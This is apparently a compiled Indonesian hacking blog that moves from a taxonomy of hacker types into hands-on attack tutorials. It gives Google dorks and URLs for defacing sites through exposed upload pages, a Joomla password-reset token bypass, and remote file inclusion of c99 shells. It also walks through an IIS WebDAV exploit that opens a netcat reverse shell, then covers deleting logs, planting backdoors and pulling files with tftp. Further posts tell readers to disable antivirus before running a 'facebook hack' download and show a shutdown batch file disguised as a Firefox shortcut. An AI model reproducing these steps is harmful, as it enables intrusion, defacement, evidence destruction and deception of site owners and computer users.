Hacking adalah sebuah seni ketrampilan mengoperasikan/mengendalikan/menguasai komputer mencakup semua aspek mulai dari level dasar sampai level tertinggi baik dalam komputerisasi dasar, pemrograman dasar sampai dengan jaringan yang sangat rumit. Sedangkan orang yang mampu melakukan itu semua di beri julukan “hacker”. Hacker umumnya JUSTRU tidak sangat ingin di publikasikan apalagi sampai menggembar-gemborkan dirinya adalah hacker. Justru hacker cenderung diam dan tertutup dengan status sosial yang sangat normal. Bahkan sangat tidak mungkin anda sangka seseorang yang pendiam dan lugu bahkan culun adalah seorang hacker (bukan berarti semuanya). Hacker umum-nya tidak merusak, mereka kebanyakan mencari informasi/data penting tingkat tinggi bukan untuk mencuri/kesenangan tapi lebih cenderung untuk mengetes, bukan  mengetes kemampuan mereka tapi system yang sedang mereka hadapi. Kebanyakan hacker tidak sangat mudah di kalahkan mereka mampu menguasai dan memutar balik keadaan karena mereka bisa di anggap satu level dengan system… Jadi kalau ada yang teriak “HAI SAYA INI HACKER” apakah dia memang masuk kategori hacker ataukah malah masuk kategori lain-nya yang lebih spesifik?
Cracker? Cracker bisa di kategorikan sebagai orang yang memahami jenis pemrograman tingkat tinggi dan sedikit pengetahuan jaringan. UMUM-nya cracker kebanyakan membuat kemampuan untuk membuah sebuah program untuk meng-disfungsikan/me-manipulasi jalur yang seharusnya. Contohnya: Cracker membuat sebuah program agar program yang seharusnya berbayar menjadi gratis. Cracker tidak terlalu memahami seluk beluk jaringan mereka kebanyakan umum-nya cenderung menyukai segala sesuatu yang bersifat GRATISAN.
Defacer? Pernah ada suatu kasus saya melihat orang dengan bangganya memamerkan nama panggilannya didalam sebuah website milik orang lain. Lalu berkata “Website itu sudah aku hack” HACK? SUMPE LO? defacer kebanyakan umum-nya adalah orang iseng yang sedang ingin mencoba mencari tau baik dari segi ilmu, kemampuan, dan jati diri… kebiasaan yang paling mudah diketahui adalah mereka gemar merubah tampilan website menggunakan/memanfaatkan kelemahan bug/kecacatan dalam sebuah program. Defacer umumnya tidak begitu memahami tentang level pemrograman mereka lebih cenderung memahami tentang kinerja sebuah webserver beserta script yang ada didalamnya.
Phreaker, Mungkin jarang di Indonesia yang pernah mendengar kata ini. Phreaker ini sebenarnya hampir sama sifatnya dengan cracker dimana sama-sama menyukai GRATISAN. Bedanya Phreaker lebih fokus ke dalam bug jaringan/telekomunikasi. Contoh mudahnya orang bisa menelpon gratis  padahal seharusnya berbayar, atau contoh lainnya seseorang menggunakan bug yang ada didalam sebuah perusahaan telekomunikasi (meskipun tidak diketahui bocornya informasi ini hasil sendiri atau diberi tahu orang dalam) itu adalah salah satu kegiatan phreaking dan orang yang melakukannya di sebut phreaker.
Hacker Wannabe, ini yang sangat banyak dan mudah di jumpai di Indonesia :)   banyaaaaaaakkkkkkkkk sekaliiiii… terutama di forum-forum. Saya kurang paham arti harfiah hacker wannabe tapi sebenarnya ini lebih cenderung mengarah ke psikologi dimana umum-nya para hacker wannabe ini ingin melakukan sesuatu yang gila dan di luar kenormalan baik di dalam cakupan kemampuannya atau diluar kemampuannya dengan tujuan mendapatkan pengakuan “hebat” atau “mampu” dari orang di sekitarnya. Contoh paling mudah kalau kalian punya teman yang mengaku bisa/jago hacking facebook/friendster dia termasuk dalam kategori hacker wannabe ini…
Script kiddies, Ini juga sangat mudah dan banyaaaaaaaaaaaaaaaaaaaaaaaaak bisa di temukan di Indonesia. Kebanyakan script kiddies ini kebanyakan berbicara blablabla padahal sebenarnya dasar tentang apa yang dia lakukan dia tidak paham. Script kiddies bisa di masukkan dalam kategori advanced user dimana keahliannya adalah “menggunakan” bukan “menemukan” apalagi sampai tingkat “menciptakan” kebanyakan manusia bergaya script kiddies adalah para defacer yang suka merubah tampilan website dengan menggunakan tools/software/program yang bukan buatannya/hasil pemikirannya sendiri.
Scammer! Kalau ini sih dulu sempat booming di Indonesia sekitar tahun 2000-2005 kalau di Indonesia dulu di beri julukan frauder alias penipu dunia maya yang cenderung menyukai melakukan penipuan/manipulasi/generalisasi kartu kredit untuk mendapatkan beberapa barang kesukaannya. Hampir sama jenisnya dengan cracker/phreaker namun sangat ceroboh dan bodoh. Umumnya scammer/frauder ini memahami tentang seluk beluk jaringan namun sangat buta tentang pemrograman dasar dan keamanan.
Newbie… kalau yang ini sih sudah tidak perlu di letakkan dalam posisi abu-abu. Group newbie ini memang benar-benar pemula alias orang yang mungkin benar-benar baru menggunakan komputer. Kebanyakan newbie bisa berkembang menjadi Hacker, Cracker, Defacer, Phreaker, Hacker Wannabe, Script kiddies, sampai Scammer. Newbie ini seperti sebuah telur yang akan ditentukan oleh tingkat pengetahuannya untuk menangkap sebuah pelajaran atau keadaan lingkungannya. Newbie bisa berubah menjadi apa saja asal ada pendukungnya dan bagaimana cara dia menilai sesuatu berdasarkan pikirannya.
Di urut berdasarkan tingkat kemampuan dan berbahaya-nya reputasi berdasarkan kategori :
  1. Hacker
  2. Phreaker
  3. Cracker
  4. Scammer
  5. Defacer
  6. Script kiddies
  7. Hacker wannabe
  8. Newbie
Sumber:  http://id.istanto.net

Cara Deface Web Dengan Mudah

Mau menjadi defacer dengan cara yang mudah? Mau deface website tanpa harus otak atik ita itu ita itu? Ok, anda bisa mencoba hal berikut untuk membuat anda terasa seperti defacer.


Ikuti langkah - langkah berikut :

  1. Klik dulu di sini
  2. Ketik inurl:examples.uploadbutton.html pada kotak pencarian google
  3. Dihasil pencarian google terdapat beberapa link, pilih salah satu untuk di deface
  4. Contoh : http://modelku.com/Public/Js/kindeditor/examples/uploadbutton.html
  5. Sekarang kalian upload script deface kalian dengan cara klik upload, pilih script defacenya, klik "open"
  6. Tunggu beberapa saat, nanti akan muncul sebuah url
  7. Copy url tersebut ke address bar, tepatnya setelah tulisan modelku.com
  8. Enter

7. Selesai, kini anda seolah - olah telah mendeface situs tersebut. Tapi ingat! Kalian tidak benar - benar mendeface website tersebut. Kita hanya mainan deface pakai kindeditor saja, bukan beneran :D

Deface Web Dengan Mudah

Deface WEB Ala anonymouse

1. Masuk http://www.google.com/
2. klik/search inurl:option=com_user daerah | tujuancontoh: inurl:option=com_user malaysia
3. misalkan dapet korban
http://starsmoon.nazuka.net/home/index.php?>option=com_user&task=register<

lihat tulisan yang ada tanda ">option=com_user&task=register<" akan di ganti dengan :


option=com_user&view=reset&layout=confirm

Jadi penulisannya...
http://starsmoon.nazuka.net/option=com_user&view=reset&layout=confirm

4. Nah di situ akan keluar token
   token tersebut di isi dengan tanda.... { ' } << Yang Bertanda Kutip satu '

Keterangan : itu adalah tanda di mana kita bisa menjadikan suatu token menjadi
eror....ckckckckckckck.... { kalo kata saya si dah kodrat.... }

5. Terus kalo berhasil km akan di bawa menuju
    tempat mengisi password baru dan konfirmasi password baru....

isi lah dengan sesuka hati.....

lanjut...................

6. langah berikutnya
setelah di berhasil isi pass tersebut anda harus login lagi dengan nama/ username

User : Admin
Pas   : nah kalo passwordnya yaitu adalah password yang baru anda buat tadi.....

7. Nah bagaimana ketahuan anda sudah masuk k adminnya????/ anda sudah menjadi admin nya....
yaitu adalah pasti kalo anda sudah bisa masuk ada gambar pensil dan ketas baru edit....
itu bila anda ingin deface halaman depan nya saja
ini contoh korbannya:
http://starsmoon.nazuka.net/

8. Lanjut....kalo anda ingin deface full seperti ini http://starsmoon.nazuka.net/

anda masuk ke emmmm...contoh tadi
http://starsmoon.nazuka.net/

9. rubah jadi http://konsultasimuamalat.com/home/administrator/
itu dari slalu ngantuk saya bljar.....

10. masuk ke bagian tempeate kalo g salah adanya di extension...
klik tempelates masuk terus liat layouts yang sedang di pakai adminnya..../ yang ada gambar bintangnya....
terus klik lalu klik edit terus klik edit html
masukan semua html kamu di situ...... afro afro

nah selesai dah....


NB : TOKEN KADANG BERHASIL KADANG TIDAK ( ' )

Deface Web Via RFI

Cara Mudah Deface Remote File Include
Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..
cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
find = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url
[EvilShellInject] = inject rshell / c99 kamu
Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :
Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com
- Site Oneadmin RFI
Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com
nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=
Contoh :
http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]
- PnPhpBB2
Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
- Support Ticket
Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=
Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]
Hehehe Lumayan banyak kan ? Nah selamat mencobanya..
Neh aku kasi beberapa web yang telah berhasil saya Deface..
Nah setelah itu buadlah sebuad file: index.html
Isi dengan:
<html>
Hacked by Nama Kamu
</html>
Kemudian upload deh file ke directorynya
kemudian buka website yang telah di deface:
http://target.com/lokasipathnya/index.html
Enjoy

Hacking Menggunakan IIS

1) Pendahuluan
Pertama-tama sebelum melakukan, biar saya jelaskan kepada anda bahwa hacking atau deface menggunakan suatu exploit yang sudah ada di internet hanya akan menjadikan anda seorang lamer atau perusak. Anda seringkali mendapati orang-orang ini melakukan deface terhadap ratusan situs. Nah, mereka ini bukanlah hacker, melainkan script kiddies, karena mereka menggunakan code yang dibuat orang lain untuk mendeface situs. Hacker yang sejati adalah orang yang menciptakan code exploit dalam ‘0 day’. Dan saya sarankan kepada anda agar JANGAN PERNAH MENJADI SCRIPT KIDDIES untuk memperoleh sedikit ketenaran dan merasa bangga dengan hal tersebut!!!
2) Adanya Celah Keamanan
Ok cukup sudah !! Mari dimulai. Pertamakali tujuan kita untuk melakukan penetrasi adalah menemukan suatu hole. Webserver IIS berisikan banyak celah keamanan yang jika dieksploitasi dengan sesuai dapat memberikan seorang hacker kendali penuh atas sistem tersebut. Celah keamanan yang umum adalah buffer overflow, yakni mengeksploitasi format string. Apakah “Buffer Overflow” itu adalah soal yang lain dan memerlukan artikel tersendiri. Atau lebih baik silakan anda baca terbitan Phrack 49 (www.phrack.com) dengan judul “Smashing The Stack For Fun and Profit”. Disana istilah buffer overflow dijelaskan berdasarkan sudut pandang Linux.
Ok, karena webserver IIS menyimpan banyak celah keamanan eksploitasi buffer overflow. Hanya dalam 2 tahun terakhir ini e-eye digital defence team (http://www.eeye.com/) melaporkan adanya buffer overflow pada seluruh ekstensi ISAPI pada IIS Webserver.
Sebagai contoh suatu request http://www.iissite.com/a.idq?aaaaaaaaaaaaaaaaaa….aaaa<shell_code_anda>
Sekarang, kapanpun webserver iis mendapatkan request berupa file seperti .idq atau .asp dsb selain .html request dipenuhi oleh file .dll yang spesifik pada webserver. Namun jika seorang hacker mengirimkan request berupa string panjang dari aaa dan mencari angka yang tepat dimana suatu buffer overflow terjadi, maka dia dapat menyesuaikan shell code ditempat tersebut dan menyebabkan shell codenya dieksekusi pada remote machine.
Catatan: Suatu shell code merupakan kode assembly yang memberikan command prompt pada Win 2000 dan shell jika pada Linux.
Tapi saat pertanyaan diajukan mengenai hacking website, kita memerlukan penemuan bug sebelumnya. Kaerna kebanyakan server yang dipatch untuk bug yang ditemukan sebelumnya. Pada dasarnya bug .idq ditemukan dua tahun terakhir tidak akan bekerja hari ini karena kebanyakan server Win 2000 telah dipatch dengan service pack sp3, sp4. Jadi saat ini yang kita perlukan adalah bug terakhir atau dalam dunia perhackingan dinamakan dengan “0day exploit”. Tempat terbaik untuk mencari exploit adalah www.packetstormsecurity.nl, situs ini secara konsisten memuat exploit, code, advisory yang terbaru. Tempat lainnya seperti www.k-otic.com/exploit atau cara terbaik adalah mencari dibagian 0day exploit pada situs kami www.hackersprogrammers.com. Sekarang ini sangat banyak 0day yang sengaja tidak pernah dipublikasikan!!! Dan hanya ditujukan untuk komunitas underground atau orang-orang tertentu yang dikenal sebagai hacker. Untuk mendapatkan exploit yang baik, anda perlu mengadakan kontak dengan hacker yang baik dan berbakat di internet. Dan pilihan terbaik adalah code yang anda buat sendiri (jika anda mampu) maka dengan ini anda mampu menghack berbagai webserver IIS di seluruh dunia!!! J
3) Mengeksploitasi celah keamanan dan Mengendalikan webserver
Ini bagian yang paling menarik. Compile code exploit anda dengan Visual C++ jika berupa kode win c atau gunakan gcc jika berupa kode linux. Jika anda tidak mengetahui hal ini, lebih baik mendownload exploit berbasis GUI dari internet (ini semakin menunjukkan bahwa anda seorang lamer). OK, sekarang sebagai contoh exploit webdave ntdll.dll yang ditemukan 3-4 bulan terakhir. Masih banyaknya server yang vulnerable untuk ini. Terakhir saat salya menuliskan artikel ini ditemukan bug terbaru berupa RPC DCOM oleh LSD. Namun bug RPC DCOM tidak akan bekerja dalam kasus ini karena firewall pada server akan memblok seluruh packet terhadap port 135. Setelah anda melihat-lihat webdave exploit, downloadlah exploit Kralor Webdave. Compile dan download exploit kralor yang berbasis GUI. Shellcode ini berupa jenis yang spesifik. Shellcode yang digunakan  exploit Kralor memberikan suatu reverse shell. Artinya setelah berhasil mengeksploitasi server tersebut akan terhubung ke computer anda melalui suatu command shell!!! Jadi anda memerlukan netcat listener untuk ‘mendengar’ port spesifik pada computer anda. Download tool netcat dari internet dan masuk ke DOS prompt, ketik sebagai berikut:
D:\nc>nc -Lvp 6666
Listening on [any] 6666 ….
Well, sekarang computer beraksi sebagai suatu server di port 6666 dan listening terhadap berbagai incoming request. Sekarang compile exploit kralor atau gunakan yang berbasis GUI, kemudian masuk ke DOS prompt dan ketik.
D:\vcproject\webdave\debug>web.exe
[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]
www.coromputer.net && undernet #coromputer
syntax: D:\WEB.EXE <host_target> <host_anda> <port_anda> [padding]
Cool !!!  Jadi apa yang harus anda lakukan? Masih bingung? OK, saya sarankan, jika anda ingin menghack suatu server, carilah ip dengan melakukan ping dari DOS. Misalkan ip 123.123.123.123 dan ip kita 200.200.200.200. Pastikan netcat menjalankan beberapa port seperti 6666 dan ketik perintah pada Dos Prompt yang baru:
D:\vcproject\webdave\debug>web.exe  123.123.123.123  200.200.200.200  6666
Terdapat padding bit yang berbeda. Dalam kasus exploit berbasis GUI dapat melakukannya sendiri, atau membaca kometar dalam exploit tersebut untuk mendapatkan suatu ide mengenai apa padding bit tersebut dan bagaimana cara menggunakannya. Setelah berhasil mengeksploitasi anda akan mendapatkan shell pada netcat listener anda.
D:\nc>nc -Lvp 6666
Listening on [any] 6666 ….
connect to 200.200.200.200 from 123.123.123.123
Microsoft(R) Windows 2000
(C)Copyright Microsoft Corp 1981-2000.
C:\winnt\system32>
Selamat!! Jadi anda berhasil mengeksploitasi bug ntdll.dll pada remote server. Command prompt telah kita dapatkan pada netcat listener yang merupakan command prompt pada remote server.
4) Apa yang harus dilakuklansetelah melakukan hacking suatu server?
Pertama kali yang terpenting yang harus dilakukan setelah melakukan hacking berbagai server di dunia internet adalah menghapus log tersebut. Setelah kita memiliki HTTP Port 80 untuk menghack, kita perlu menghapus log IIS. Direktorinya dalam hal ini ada di C:\winnt\system32\logfiles . Jadi pada shell tersebut anda tinggal mengetik.
C:\winnt\system32> rmdir /s /q logfiles
Yang menghapus direktori log file, file dan folder yang terdapat dalam direktori tersebut.
Catatan: Ini merupakan cara yang buruk dalam menghapus file log. Admin dapat langsung mengetahui bahwa seseorang telah menghacking servernya. Cara lain yang terbaik adalah masuk kedalam direktori logfile dan cari file log yang spesifik dan menghapus hanya pada baris ayng berisikan ip anda.
Sekarang, setelah megnhapus log file. Anda dapat bermain-main dengan server tersebut. Seluruh server berada dalam kendali anda. Hal terbaik adalah menginstall suatu backdoor pada server tersebut. Membua backdoor senfiri atau sebagai gantinya mengupload netcat apda server tersebut dan menjadinnya listen pada beberapa port yang spesifik dan anda juga dapat menambahkan entri dalam registri jadi dapat tetap dalam keadaan listening bahkan setelah server tersebut direstart.
Langkah berikutnya, misalkan anda ingin mendeface situs tersebut, maka carilah direktori webrootnya. Direktori default biasanya adalah  C:\inetpub\wwwroot, disana anda akan menemukan file seperti index.html, index.asp, default.html dan file-file lain seperti itu. Jika ada, maka anda sudah berada pada direktori yang dimaksud. Sekarang tinggal membackup file index.html nya. Perintahnya adalah sebagai berikut:
C:\inetpub\wwwroot> copy index.html indexold.html
C:\inetpub\wwwroot> echo defaced by Chintan Trivedi > index.html
Wah !! Akhirnya anda berhasil mendeface situs tersebut. Jika anda ingin mengupload file anda sendiri ke server tersebut, maka anda harus memiliki TFTP server pada sistem anda. Jalankan dan ketik ketik perintah remote shell berikut:
C:\inetpub\wwwroot> tftp 200.200.200.200 GET index.html
Perintah ini akan mengupload file index.html anda ke web server. Oh ya, contoh diatas dengan anggapan 200.200.200.200 menjadi ip anda. Dan ingatlah mengenai satu hal penting. Webdave exploit dapat menyebabkan crash pada server IIS. Jadi situs tidak akan terbuka dan anda tidak dapat melihat halaman yang terdeface L Jangan khawatir, ada cara untuk merestart IIS pada remote system tersebut, yaitu:
C:\inetpub\wwwroot> iisreset /restart /rebootonerror /timeout:100
Tunggulah sebentar dan bukalah situs tersebut, misalnya www.target.com dan lihat halaman yang telah anda deface!!! Nah ini semua hanyalah satu contoh hacking webserver menggunakan webdave exploit. Terus memperbarui sesi 0day anda di www.hackersprogrammers.com dengan 0day exploit terbaru. Setiap exploit bekerja dengan caranya masing-masing. Anda dapat melihat penjelasan yang tersedia pada exploit tersebut jika anda bukan seorang script kiddie.
5) Kesimpulan
Hal yang perlu saya katakan kepada anda bahwa hacking atau mendeface melalui exploit ‘siap-pakai’ yang tersedia di internet adalah tindakan merusak. Janganlah dilakukan terus menerus. Melakukan hacking suatu server hanya jika anda memang memiliki alasan kuat untuk melakukannya dan anda benar-benar mengetahui apa yang sedang anda lakukan. Jika anda melakukan hacking secara membabi-buta anda hanya akan menyebabkan berbagai kerusakan, kebencian dan tidak memahami bagaimana dunia ini bekerja.
Dan untuk admin: jika anda ingin melindungi server anda dari hacker, maka langkah terbaik adalah tetap mengupdate dengan service pack terakhir yang disediakan oleh Microsoft. Kedua, kapanpun server anda dihack atau terdeface, silakan periksa pada sistem anda, apakah telah terinstall backdoor, rootkit. Kalau ada, hapuslah. Ketiga menjaga direktori file log dari seseorang yang tidak berhak. IIS menyediakan fasilitas untuk mengubah direktori file log. Tapi dalam berbagai kasus, tetap saja pencegahan jauh lebih baik daripada penyembuhan.

Sunday, July 15, 2012

hack facebook (NEW) by farhan


  hack facebook

caranya :
  • download filenya
  • matikan anti virus
  • ekstrak terlebih dahulu
  • buka file nya
selamat mencoba.

*sumber: http://www.farhan-trick.co.cc/2012/07/hack-facebook-new-by-farhan.html

Saturday, July 7, 2012

Membuat virus Facebook

Cara iseng ngerjain temen di facebook – Nah salah satu cara buat ngerjain akun facebook orang, kita bisa membuat sebuah virus facebook. Istilah tepatnya sih bukan virus ini hanya menggunakan program notepad dengan sedikit kreativitas yang bakal membuat facebookers langsung shock dan kaget dengan apa yang mereka lihat.. Gimana sih cara buatnya ? This is simple .
How to make a fake facebook virus – method
1. BUka program notepad atau biar cepet menu RUN ketik notepad lalu enter
2. Copy kode ini dan pastekan di notepad kamu
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c ” SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED BY SHADOWSMAKER IH-crew!!! PLEASE WAIT ………..”



3. Habis itu simpen file notepad ini dengan format *.bat = terserah mau diberi nama apa, misal :pacebuk.bat dan SAVE di Dekstop (Recommended)
4. Sekarang klik kanan desktopmu dan pilih New => Shortcut
5. Setelah ini akan muncul sebuah tampilan dan 
klik browse lalu cari lokasi file .bat yang kamu simpen tadi, misal tadi kamu save pada dekstop
6. Klik 
Next dan Rename dengan Mozilla Firefox (Untuk nama ini terserah kamu dan bebas bisa ganti dengan Opera Mini atau Google Chrome, ini hanya sebagai tipuan aja)
7.Bila semua langkah sudah oke, sekarang yang perlu kamu lakuin adalah 
mengubah icon .bat tadi dalam bentuk Mozilla Firefox (karena kita sering pakai Mozilla jadi pembahasannya pakai browser ini) .. Terus caranya gimana ?
Gampang.. tinggal kamu 
klik kanan file .bat tadi dan pilih change icon :)
Gak nemu icon mozilla ? Coba deh low cari di 
Program Files => Mozilla Firefox
Nah sekarang virus facebookmu telah jadi dengan sempurna, kalau kamu ingin iseng nyoba tinggal di klik aja deh dan lihat perubahan yang akan terjadi .. Harusnya pasti sedikit kaget dan coba low bayangin kalau trik ini kamu praktekan di kompi temen kamu atau mungkin kompi kampus atau warnet.. what will happen ? hahhaha ..
moga berguna gan 
sumber: http://ubaynyzhar.blogspot.com